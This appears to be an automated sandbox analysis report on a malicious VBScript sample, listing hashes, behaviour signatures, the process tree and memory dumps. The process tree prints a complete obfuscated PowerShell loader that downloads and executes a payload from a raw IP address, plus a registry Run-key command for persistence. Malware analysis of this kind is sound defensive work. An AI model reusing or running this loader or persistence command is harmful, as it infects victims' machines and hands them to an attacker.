Analysis
-
max time kernel
54s -
max time network
68s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
19-04-2024 01:27
Errors
Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-19T01:28:56Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win10v2004-20240412-en/instance_6-dirty.qcow2\"}"
General
-
Target
610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546.vbs
-
Size
187KB
-
MD5
f08f508e797fa19d89a8a4688019fd99
-
SHA1
32de77ff5689fbc68f64aa9cfd4405cc2686fd85
-
SHA256
610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546
-
SHA512
d33d6dbbac2945a22483026039a6f007698bbbc8a0e507a6cf14fb2a64e92125adbc5081c914fc5e7d6ff73c7018b28c38fa21b01a4c164b7e6fab7cc62c014d
-
SSDEEP
3072:2MC8jqTKK8ccABOwbDS2y2zJETxUuoHh3uSH/OY6C1HwvBpVs2RtBZo5mFSarDYM:QTR8ccABOwbDA2zJETxVu1NH/vsd7tBb
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4jzkethh.e5q.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Eyelike0.ForFilesize
447KB
MD5397424a6762fce62bd0c55cb362f4daf
SHA10a1968b4c10c88d849253bafa5d8c461b571a618
SHA256f9daf79d74a43af5b935a283d1c6f98e7f55fa755205b6fe94fd8f75e6607e92
SHA5121903aeed3166d4cc742847acb8b3f710e4e2f5186eb0a4f000da881578b2521931cad8cb76d510fa51a5f4b02cf75241b09c1d5e53ab2d0d94a2ebca036653a3
-
memory/2576-43-0x0000000008810000-0x0000000008DB4000-memory.dmpFilesize
5.6MB
-
memory/2576-17-0x0000000074E10000-0x00000000755C0000-memory.dmpFilesize
7.7MB
-
memory/2576-63-0x0000000008DC0000-0x0000000009AB9000-memory.dmpFilesize
13.0MB
-
memory/2576-61-0x0000000074E10000-0x00000000755C0000-memory.dmpFilesize
7.7MB
-
memory/2576-18-0x0000000002A00000-0x0000000002A36000-memory.dmpFilesize
216KB
-
memory/2576-19-0x0000000002BD0000-0x0000000002BE0000-memory.dmpFilesize
64KB
-
memory/2576-20-0x0000000005570000-0x0000000005B98000-memory.dmpFilesize
6.2MB
-
memory/2576-21-0x0000000005230000-0x0000000005252000-memory.dmpFilesize
136KB
-
memory/2576-22-0x00000000053D0000-0x0000000005436000-memory.dmpFilesize
408KB
-
memory/2576-23-0x0000000005440000-0x00000000054A6000-memory.dmpFilesize
408KB
-
memory/2576-55-0x0000000008DC0000-0x0000000009AB9000-memory.dmpFilesize
13.0MB
-
memory/2576-34-0x00000000063A0000-0x00000000063BE000-memory.dmpFilesize
120KB
-
memory/2576-45-0x0000000002BD0000-0x0000000002BE0000-memory.dmpFilesize
64KB
-
memory/2576-54-0x0000000002BD0000-0x0000000002BE0000-memory.dmpFilesize
64KB
-
memory/2576-52-0x0000000077831000-0x0000000077951000-memory.dmpFilesize
1.1MB
-
memory/2576-51-0x0000000002BD0000-0x0000000002BE0000-memory.dmpFilesize
64KB
-
memory/2576-39-0x0000000007BE0000-0x000000000825A000-memory.dmpFilesize
6.5MB
-
memory/2576-40-0x0000000006940000-0x000000000695A000-memory.dmpFilesize
104KB
-
memory/2576-41-0x0000000007640000-0x00000000076D6000-memory.dmpFilesize
600KB
-
memory/2576-42-0x00000000075D0000-0x00000000075F2000-memory.dmpFilesize
136KB
-
memory/2576-33-0x0000000005CB0000-0x0000000006004000-memory.dmpFilesize
3.3MB
-
memory/2576-49-0x0000000008DC0000-0x0000000009AB9000-memory.dmpFilesize
13.0MB
-
memory/2576-35-0x00000000063C0000-0x000000000640C000-memory.dmpFilesize
304KB
-
memory/2576-46-0x00000000078D0000-0x00000000078D1000-memory.dmpFilesize
4KB
-
memory/2576-47-0x0000000008DC0000-0x0000000009AB9000-memory.dmpFilesize
13.0MB
-
memory/2576-48-0x0000000074E10000-0x00000000755C0000-memory.dmpFilesize
7.7MB
-
memory/3804-59-0x0000000077831000-0x0000000077951000-memory.dmpFilesize
1.1MB
-
memory/3804-56-0x00000000778B8000-0x00000000778B9000-memory.dmpFilesize
4KB
-
memory/3804-58-0x0000000002260000-0x0000000002F59000-memory.dmpFilesize
13.0MB
-
memory/3804-53-0x0000000002260000-0x0000000002F59000-memory.dmpFilesize
13.0MB
-
memory/3804-66-0x0000000001000000-0x0000000002254000-memory.dmpFilesize
18.3MB
-
memory/3804-65-0x0000000001000000-0x0000000002254000-memory.dmpFilesize
18.3MB
-
memory/3804-57-0x0000000077831000-0x0000000077951000-memory.dmpFilesize
1.1MB
-
memory/3804-64-0x0000000001000000-0x0000000002254000-memory.dmpFilesize
18.3MB
-
memory/3804-70-0x0000000001000000-0x0000000002254000-memory.dmpFilesize
18.3MB
-
memory/3804-60-0x0000000001000000-0x0000000002254000-memory.dmpFilesize
18.3MB
-
memory/3892-36-0x00007FFF89970000-0x00007FFF8A431000-memory.dmpFilesize
10.8MB
-
memory/3892-12-0x00007FFF89970000-0x00007FFF8A431000-memory.dmpFilesize
10.8MB
-
memory/3892-14-0x0000021F795E0000-0x0000021F795F0000-memory.dmpFilesize
64KB
-
memory/3892-38-0x0000021F795E0000-0x0000021F795F0000-memory.dmpFilesize
64KB
-
memory/3892-2-0x0000021F797C0000-0x0000021F797E2000-memory.dmpFilesize
136KB
-
memory/3892-13-0x0000021F795E0000-0x0000021F795F0000-memory.dmpFilesize
64KB
-
memory/3892-69-0x00007FFF89970000-0x00007FFF8A431000-memory.dmpFilesize
10.8MB
-
memory/3892-37-0x0000021F795E0000-0x0000021F795F0000-memory.dmpFilesize
64KB